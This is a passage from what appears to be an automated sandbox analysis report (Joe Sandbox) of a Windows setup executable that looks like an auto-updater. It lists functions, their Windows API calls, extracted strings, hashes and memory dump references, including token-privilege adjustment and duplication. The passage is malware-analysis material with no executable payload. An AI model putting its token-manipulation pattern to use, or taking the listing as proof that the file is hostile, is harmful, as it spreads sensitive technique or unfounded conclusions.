                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileTime$InfoModuleNameSystemUserlstrcpy$AddressCurrentDateDefaultGlobalHandleLanguageLocalLocaleMemoryProcProcessStatusWritelstrlenwsprintfwvsprintf
                                                                                                                          • String ID: $%d MBytes paging file free.$%d MBytes paging file.$%d MBytes physical memory free.$%d MBytes physical memory.$%d MBytes user address space free.$%d MBytes user address space.$%d processor(s), type %d.$%d%% memory in use.$%s, run by %s.$Error occurred at %s.$Executable: 32bit on 64bit platform (WOW64).$Executable: 32bit.$Language : %s - (%d)$Operating system: %s (%s).$Unknown
                                                                                                                          • API String ID: 3249360288-2024363017
                                                                                                                          • Opcode ID: bf57721e95c076d9948bc8d76703ae6b5ae9e4700ea03c0aacf23950a1eb9f40
                                                                                                                          • Instruction ID: 74e9a574a3a9c32669cd242ad059a0cfe531c4eb08cc313b6205229e08d5ff97
                                                                                                                          • Opcode Fuzzy Hash: bf57721e95c076d9948bc8d76703ae6b5ae9e4700ea03c0aacf23950a1eb9f40
                                                                                                                          • Instruction Fuzzy Hash: 39515072D0512C6BDB21AB54CC46FEE73BCEF05704F0441E5F909E2182DAB4AB85AFA5
                                                                                                                          Function 00C19C19 Relevance: 40.8, APIs: 15, Strings: 8, Instructions: 557synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C19C23
                                                                                                                          • #17.COMCTL32(00000A18), ref: 00C19C32
                                                                                                                            • Part of subcall function 00C39847: __EH_prolog3.LIBCMT ref: 00C3984E
                                                                                                                            • Part of subcall function 00C3A1E2: __EH_prolog3_GS.LIBCMT ref: 00C3A1EC
                                                                                                                            • Part of subcall function 00C3A1E2: WSAStartup.WS2_32(00000101,?), ref: 00C3A231
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000), ref: 00C19C72
                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 00C19E63
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C19E6F
                                                                                                                            • Part of subcall function 00C2E48B: __EH_prolog3.LIBCMT ref: 00C2E492
                                                                                                                          Strings
                                                                                                                          • Unable to continue. No write permissions in the update location., xrefs: 00C1A3F5
                                                                                                                          • AFX_AUTOUPDATE_200405172224, xrefs: 00C19F41
                                                                                                                          • /cp:, xrefs: 00C19D68
                                                                                                                          • /w:, xrefs: 00C19DDD
                                                                                                                          • /forcebeta, xrefs: 00C19D48
                                                                                                                          • MultiUpdate - Can not located files to update, xrefs: 00C1A218, 00C1A228
                                                                                                                          • Only ONE instace of this program can run at one time., xrefs: 00C19FA9
                                                                                                                          • Could not locate %s.The update program must be run from where %s is located!., xrefs: 00C1A1A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3H_prolog3_$CloseCurrentDirectoryHandleMutexReleaseStartup
                                                                                                                          • String ID: /cp:$/forcebeta$/w:$AFX_AUTOUPDATE_200405172224$Could not locate %s.The update program must be run from where %s is located!.$MultiUpdate - Can not located files to update$Only ONE instace of this program can run at one time.$Unable to continue. No write permissions in the update location.
                                                                                                                          • API String ID: 3154394641-1665516921
                                                                                                                          • Opcode ID: 61da04bf93e2767de1c6076ff29bd065086cb04684ae2a2bd823a129dbeb01a6
                                                                                                                          • Instruction ID: 139b04911ffd2d296182ce8f97e28bff411529f714d8f36bd9318c6bbbb55872
                                                                                                                          • Opcode Fuzzy Hash: 61da04bf93e2767de1c6076ff29bd065086cb04684ae2a2bd823a129dbeb01a6
                                                                                                                          • Instruction Fuzzy Hash: DF32B470901269DEDB24EB64CC99BEDB774AF16300F0041E9E41AA3192DB745FC9EF62
                                                                                                                          Function 00C277AA Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 134libraryloaderthreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C277B1
                                                                                                                          • GetCurrentProcess.KERNEL32(00000020,?,00000048,00C1C63F,?,?,?,?), ref: 00C277E7
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00C277F4
                                                                                                                          • GetLastError.KERNEL32 ref: 00C277FA
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00C2781B
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00C27833
                                                                                                                          • GetLastError.KERNEL32 ref: 00C27839
                                                                                                                          • GetShellWindow.USER32 ref: 00C27852
                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00C27861
                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C27875
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00C27890
                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,0000018B,00000000,00000002,00000001,?), ref: 00C278A7
                                                                                                                          • LoadLibraryW.KERNEL32(AdvApi32), ref: 00C278B9
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 00C278D2
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00C278DD
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00C27904
                                                                                                                          • GetLastError.KERNEL32(?), ref: 00C27914
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Token$ErrorLastLibraryOpen$FreeWindow$AddressAdjustCurrentDuplicateH_prolog3_LoadLookupPrivilegePrivilegesProcShellThreadValue
                                                                                                                          • String ID: AdvApi32$CreateProcessWithTokenW$SeIncreaseQuotaPrivilege
                                                                                                                          • API String ID: 1554674823-3770288093
                                                                                                                          • Opcode ID: dcaf5173fcb2ca7caa26c9470dde1811b0ed6641b9eb819d5e5f4811aa05c551
                                                                                                                          • Instruction ID: dc4138c431919c2688bb2dad7665eaff758a75ee65cf09a0bccb9e456afc1467
                                                                                                                          • Opcode Fuzzy Hash: dcaf5173fcb2ca7caa26c9470dde1811b0ed6641b9eb819d5e5f4811aa05c551
                                                                                                                          • Instruction Fuzzy Hash: 0151E8B1904219AFDF119FA4DC89BAEBBB9FF08740F14412AF515B62A0DB709D51DB20
                                                                                                                          Function 00C684C0 Relevance: 33.2, Strings: 26, Instructions: 742COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EUC-JP$ISO LATIN 1$ISO LATIN 2$ISO-10646-UCS-2$ISO-10646-UCS-4$ISO-2022-JP$ISO-8859-1$ISO-8859-2$ISO-8859-3$ISO-8859-4$ISO-8859-5$ISO-8859-6$ISO-8859-7$ISO-8859-8$ISO-8859-9$ISO-LATIN-1$ISO-LATIN-2$SHIFT_JIS$UCS-2$UCS-4$UCS2$UCS4$UTF-16$UTF-8$UTF16$UTF8
                                                                                                                          • API String ID: 0-1853580349
                                                                                                                          • Opcode ID: 9e5b4295e90d69b3c698ec4eecc5340ba8b1d5d8476c17514bb49775322f684c
                                                                                                                          • Instruction ID: e128c18099d7022cc93c726692bde71ede27c276df6507413e06d3c5934cad59
                                                                                                                          • Opcode Fuzzy Hash: 9e5b4295e90d69b3c698ec4eecc5340ba8b1d5d8476c17514bb49775322f684c
                                                                                                                          • Instruction Fuzzy Hash: B332C6616081890ACF718F3099E17F67BA79F66358F9806E9CC96CB242EE13CF4DC251
                                                                                                                          Function 00C2C2ED Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 312fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00C2C43E
                                                                                                                          • GetLastError.KERNEL32(?), ref: 00C2C451
                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C2C4B8
                                                                                                                          • GetLastError.KERNEL32 ref: 00C2C4C5
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00C2C542
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00C2C590
                                                                                                                          • GetLastError.KERNEL32(?), ref: 00C2C59B
                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C2C5EC
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00C2C60B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find$ErrorLast$AttributesFirst$CloseNext
                                                                                                                          • String ID: \
                                                                                                                          • API String ID: 2822194134-2967466578
                                                                                                                          • Opcode ID: 6a6a08981d08c188f752cae736734a8dc5bcb444408c54137cea68f3184cbed8
                                                                                                                          • Instruction ID: fee675d3083fc197fb02040520ff3e097547cbbbdfa86e499ee8646728d66f84
                                                                                                                          • Opcode Fuzzy Hash: 6a6a08981d08c188f752cae736734a8dc5bcb444408c54137cea68f3184cbed8
                                                                                                                          • Instruction Fuzzy Hash: 6BC1C6B0504B609AE734D674E8CC7FF77D8AF04314F140D1EE5BA825D1DB60AA88EB54
                                                                                                                          Function 00C24DE6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 94libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C24DED
                                                                                                                            • Part of subcall function 00C24CED: GetClassInfoW.USER32(?,?,?), ref: 00C24D07
                                                                                                                            • Part of subcall function 00C24CED: LoadCursorW.USER32(00000000,00007F00), ref: 00C24D3A
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C24F22
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C24F48
                                                                                                                            • Part of subcall function 00C2D4B5: DeleteObject.GDI32(00000000), ref: 00C2D4C4
                                                                                                                          • LoadLibraryW.KERNEL32(MSIMG32.DLL), ref: 00C24F57
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GradientFill), ref: 00C24F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Load$AddressClassCursorDeleteH_prolog3InfoLibraryProc
                                                                                                                          • String ID: GradientFill$KCSideBanner$MSIMG32.DLL$Tahoma$Tahoma Bold
                                                                                                                          • API String ID: 916428825-2494292399
                                                                                                                          • Opcode ID: ff5ddedd7d4c5853c2291923b988c858ba5a7c7560ca193e5a8265b7a4adcd5b
                                                                                                                          • Instruction ID: 79762d60c05287ea3af085abe2a627bf17945107575fb2a4e4f7ee3787a25469
                                                                                                                          • Opcode Fuzzy Hash: ff5ddedd7d4c5853c2291923b988c858ba5a7c7560ca193e5a8265b7a4adcd5b
                                                                                                                          • Instruction Fuzzy Hash: ED4110B0A01706EEDB08DFB5C855BDDFBB4BF14304F50421AE15967281DBB42519DF91
                                                                                                                          Function 00C35A5B Relevance: 15.6, APIs: 10, Instructions: 599windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C35A62
                                                                                                                          • _memcpy_s.LIBCMT ref: 00C35BF3
                                                                                                                          • _memcpy_s.LIBCMT ref: 00C35C62
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?,?,00000000), ref: 00C35D96
                                                                                                                          • GetFocus.USER32 ref: 00C3607F
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C360B5
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00C360CD
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00C3616E
                                                                                                                          • IsWindow.USER32(00000000), ref: 00C36175
                                                                                                                          • SetFocus.USER32(00000000,?,00000007,?,00000000), ref: 00C36180
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableFocus_memcpy_s$EnabledFileH_prolog3PathRemoveSpec
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2321674057-0
                                                                                                                          • Opcode ID: 9c93a38bc867aef25e6ae53be0f6245cead343e04a1d7b4b209f7f4ee016cc83
                                                                                                                          • Instruction ID: 1b0750ba645fc152f07486ae81d9b0f6da54b4fd1b1bdb9f7a013eddf9a88f66
                                                                                                                          • Opcode Fuzzy Hash: 9c93a38bc867aef25e6ae53be0f6245cead343e04a1d7b4b209f7f4ee016cc83
                                                                                                                          • Instruction Fuzzy Hash: 7E32B271E10626DFCB14DFA8C885BADB7B5FF48310F15426EE855AB291DB70AD01CBA0
                                                                                                                          Function 00C1CA99 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 265COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1CAA3
                                                                                                                            • Part of subcall function 00C24510: __EH_prolog3_catch.LIBCMT ref: 00C24517
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C2452A
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00C2455A
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,00CB038C,?,?), ref: 00C2457C
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00C245A7
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000000,?,?,?,?,00000354,00C15963), ref: 00C245B9
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,00000354,00C15963), ref: 00C245D4
                                                                                                                            • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
                                                                                                                          Strings
                                                                                                                          • Your current version can not be upgraded. Will download full installer instead., xrefs: 00C1CD4F
                                                                                                                          • Failed to get version information from "%s" ! Aborting..., xrefs: 00C1CB35
                                                                                                                          • ==> Forcing update., xrefs: 00C1CD01, 00C1CD09
                                                                                                                          • Current installed version is %d.%d.%d.%d, xrefs: 00C1CB68
                                                                                                                          • The full installer will be downloaded!, xrefs: 00C1CC55
                                                                                                                          • ==> Newer version found., xrefs: 00C1CCF6
                                                                                                                          • Failed to get version information from "%s"! Aborting..., xrefs: 00C1CC35
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DefaultFileInfoLangQueryUserValueVersion$H_prolog3_H_prolog3_catchSizeUpdateWindow
                                                                                                                          • String ID: ==> Forcing update.$==> Newer version found.$Current installed version is %d.%d.%d.%d$Failed to get version information from "%s" ! Aborting...$Failed to get version information from "%s"! Aborting...$The full installer will be downloaded!$Your current version can not be upgraded. Will download full installer instead.
                                                                                                                          • API String ID: 158085385-1079758262
                                                                                                                          • Opcode ID: 40c683cb3191703084b5e1e2d460e432e28c983d9dd30c18563be64fb2f45280
                                                                                                                          • Instruction ID: a7e16711789332059f08143fa83a46bb3e1dd1acad2da79380f43988aa922185
                                                                                                                          • Opcode Fuzzy Hash: 40c683cb3191703084b5e1e2d460e432e28c983d9dd30c18563be64fb2f45280
                                                                                                                          • Instruction Fuzzy Hash: 21A1C170900254AFDF14DBA4CC91BEEB7B9AF54300F0445BAF949F7182EA305E95EB61
                                                                                                                          Function 00C4077C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C4078E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00C4079E
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C407A7
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C407B5
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000004,?,00000003,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C407EC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleInfoLocaleModuleProc
                                                                                                                          • String ID: GetLocaleInfoEx$kernel32.dll
                                                                                                                          • API String ID: 1461536855-1547310189
                                                                                                                          • Opcode ID: 39dc0d4ab44a2a00f3694b325ac848fac2d9a8d09a5a17f037fa20ff2ba209c2
                                                                                                                          • Instruction ID: 1345b012b3d87540aead1cd982de8f310fd3c81d87e34d9ec30186547c2147a5
                                                                                                                          • Opcode Fuzzy Hash: 39dc0d4ab44a2a00f3694b325ac848fac2d9a8d09a5a17f037fa20ff2ba209c2
                                                                                                                          • Instruction Fuzzy Hash: 0E01FB35540256EF8F011FA0EC4CA9E3F69FF087A57144115FE05A2160DB35D9119FA1
                                                                                                                          Function 00C12032 Relevance: 12.1, APIs: 8, Instructions: 52clipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OpenClipboard.USER32(?), ref: 00C12059
                                                                                                                          • EmptyClipboard.USER32 ref: 00C12063
                                                                                                                          • GlobalAlloc.KERNEL32(00002002,?,?,00C11EF8,?,?), ref: 00C12072
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C1207F
                                                                                                                          • _strncpy.LIBCMT ref: 00C1208A
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00C12093
                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00C1209C
                                                                                                                          • CloseClipboard.USER32 ref: 00C120A7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock_strncpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4184754841-0
                                                                                                                          • Opcode ID: 414776b4a6a9b1d58cd76bfe02d1820a88ca8354e312591765cf0eaffccfbe12
                                                                                                                          • Instruction ID: b0bd64c7030ea6ab4313982deb842fa10fe19da2bec48a8d3c8c8ba5097cef3f
                                                                                                                          • Opcode Fuzzy Hash: 414776b4a6a9b1d58cd76bfe02d1820a88ca8354e312591765cf0eaffccfbe12
                                                                                                                          • Instruction Fuzzy Hash: 1F01F535100211ABC7206F60DC0DBEE7BA8BF4A711F05801AF509862A5DF30D594EB60
                                                                                                                          Function 00C40F9D Relevance: 10.6, APIs: 7, Instructions: 138fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C40FA7
                                                                                                                          • PathIsUNCW.SHLWAPI(?,?,?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C41057
                                                                                                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2), ref: 00C4107B
                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,00C40F0D,?,?,00000000,?,00C34DF0,4641B5ED), ref: 00C40FDA
                                                                                                                            • Part of subcall function 00C40F5B: GetLastError.KERNEL32(?,?,?,00C4108C,?,?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C40F67
                                                                                                                            • Part of subcall function 00C40F11: PathStripToRootW.SHLWAPI(00000000), ref: 00C40F45
                                                                                                                          • CharUpperW.USER32(?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C410A9
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C410C1
                                                                                                                          • FindClose.KERNEL32(00000000,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C410CD
                                                                                                                          Memory Dump Source
